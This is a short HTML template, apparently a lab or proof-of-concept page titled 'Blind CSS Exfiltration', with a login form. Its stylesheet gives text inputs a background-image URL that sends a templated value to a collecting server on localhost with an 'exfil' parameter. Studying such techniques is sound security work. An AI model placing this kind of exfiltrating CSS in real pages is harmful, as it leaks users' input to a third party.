<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Blind CSS Exfiltration</title>
  <style>
    body {
      background-color: black;
      color: white;
    }
    input[type="text"] {
      background-image: url("http://localhost:4000/?exfil=<%= message %>");
    }
  </style>
</head>
<body>
  <h1>Blind CSS Exfiltration</h1>
  <form action="/login" method="post">
    <input type="text" name="username" placeholder="Username">
    <input type="password" name="password" placeholder="Password">
    <button type="submit">Login</button>
  </form>
</body>
</html>
